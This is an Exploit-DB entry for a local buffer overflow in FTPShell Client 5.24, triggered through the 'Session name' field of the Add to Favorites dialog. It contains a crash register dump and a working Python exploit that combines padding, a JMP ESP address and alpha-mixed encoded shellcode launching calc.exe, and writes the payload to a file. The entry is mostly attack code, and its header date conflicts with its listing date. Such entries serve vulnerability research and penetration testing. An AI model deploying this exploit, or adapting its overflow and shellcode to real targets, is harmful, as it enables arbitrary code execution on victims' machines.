FTPShell Client 5.24 - 'Add to Favorites' Buffer Overflow

EDB-ID:

39159

CVE:


EDB Verified:

Author:

INSECT.B

Type:

local

Exploit:   /  

Platform:

Windows

Date:

2016-01-04

Vulnerable App: 
# Exploit Title: FTPShell Client 5.24 - Add to Favorites Buffer Overflow
# Google Dork: N/A
# Date: 2015-01-04
# Exploit Author: INSECT.B
#	Twitter : @INSECT.B
#	Facebook : https://www.facebook.com/B.INSECT00
#	Blog : http://binsect00.tistory.com
# Vendor Homepage: www.ftpshell.com
# Software Link: http://www.ftpshell.com/download.htm
# Version: 5.24
# Tested on: Windows7 Ultimate SP1 K x86 
# CVE : N/A

"""
[+] Type : Buffer Overflow
[-]	 ftpsehll client has a buffer overlow entry point in the [Favorites] - [Add to favorites..] 'Session name' input field
[-]	used to add session to favorites list .

[+]Crash : input 'A' x 1500 to Session name field
[-] (4c4.8f8): Access violation - code c0000005 (!!! second chance !!!)
[-] eax=00000000 ebx=00944a0c ecx=00000000 edx=41414141 esi=00000500 edi=0012fe1c
[-] eip=41414141 esp=0012fd54 ebp=41414141 iopl=0         nv up ei pl zr na pe nc
[-] cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00210246
[-] 41414141 ??              ???
"""

import struct

junk = "A"*460
junk2 = "\x90"*248

esp = "\x0B\xD4\xDF\x73" # JMP ESP

#shellcode
#CMD : calc.exe
#encoder : Alpha-mix encoder
#buffer register : esp 
sc = ("\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49" +
"\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30" +
"\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42" +
"\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x4b\x4c\x38\x68" +
"\x4b\x32\x33\x30\x75\x50\x63\x30\x65\x30\x6c\x49\x5a\x45" +
"\x65\x61\x39\x50\x35\x34\x4c\x4b\x46\x30\x54\x70\x4e\x6b" +
"\x63\x62\x46\x6c\x6e\x6b\x43\x62\x47\x64\x4c\x4b\x44\x32" +
"\x46\x48\x74\x4f\x4f\x47\x51\x5a\x37\x56\x35\x61\x59\x6f" +
"\x6e\x4c\x45\x6c\x43\x51\x53\x4c\x43\x32\x44\x6c\x65\x70" +
"\x5a\x61\x5a\x6f\x74\x4d\x37\x71\x6a\x67\x4a\x42\x39\x62" +
"\x76\x32\x42\x77\x6c\x4b\x31\x42\x36\x70\x4e\x6b\x33\x7a" +
"\x57\x4c\x6e\x6b\x32\x6c\x66\x71\x42\x58\x78\x63\x53\x78" +
"\x73\x31\x7a\x71\x36\x31\x4e\x6b\x66\x39\x51\x30\x36\x61" +
"\x59\x43\x6e\x6b\x57\x39\x62\x38\x58\x63\x45\x6a\x52\x69" +
"\x6c\x4b\x44\x74\x4e\x6b\x55\x51\x7a\x76\x70\x31\x69\x6f" +
"\x6c\x6c\x6f\x31\x48\x4f\x36\x6d\x65\x51\x7a\x67\x76\x58" +
"\x59\x70\x61\x65\x48\x76\x53\x33\x71\x6d\x4b\x48\x35\x6b" +
"\x61\x6d\x36\x44\x31\x65\x4b\x54\x30\x58\x6e\x6b\x66\x38" +
"\x76\x44\x56\x61\x4e\x33\x51\x76\x6c\x4b\x74\x4c\x72\x6b" +
"\x6e\x6b\x71\x48\x47\x6c\x57\x71\x7a\x73\x4c\x4b\x66\x64" +
"\x6e\x6b\x36\x61\x6e\x30\x4d\x59\x50\x44\x57\x54\x66\x44" +
"\x63\x6b\x71\x4b\x61\x71\x63\x69\x61\x4a\x36\x31\x39\x6f" +
"\x59\x70\x61\x4f\x61\x4f\x52\x7a\x4c\x4b\x64\x52\x5a\x4b" +
"\x6e\x6d\x31\x4d\x32\x4a\x75\x51\x6c\x4d\x4b\x35\x48\x32" +
"\x75\x50\x65\x50\x67\x70\x66\x30\x73\x58\x65\x61\x4c\x4b" +
"\x52\x4f\x6b\x37\x59\x6f\x48\x55\x4d\x6b\x38\x70\x78\x35" +
"\x59\x32\x33\x66\x72\x48\x79\x36\x5a\x35\x6d\x6d\x4d\x4d" +
"\x6b\x4f\x58\x55\x45\x6c\x33\x36\x61\x6c\x76\x6a\x6b\x30" +
"\x6b\x4b\x4d\x30\x54\x35\x45\x55\x4f\x4b\x62\x67\x37\x63" +
"\x70\x72\x70\x6f\x70\x6a\x45\x50\x46\x33\x69\x6f\x49\x45" +
"\x50\x63\x65\x31\x50\x6c\x71\x73\x46\x4e\x42\x45\x70\x78" +
"\x73\x55\x75\x50\x41\x41"
)



payload = junk + esp + sc + junk2

file=open("C:\\shelll","w")
file.write(payload)
file.close()
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services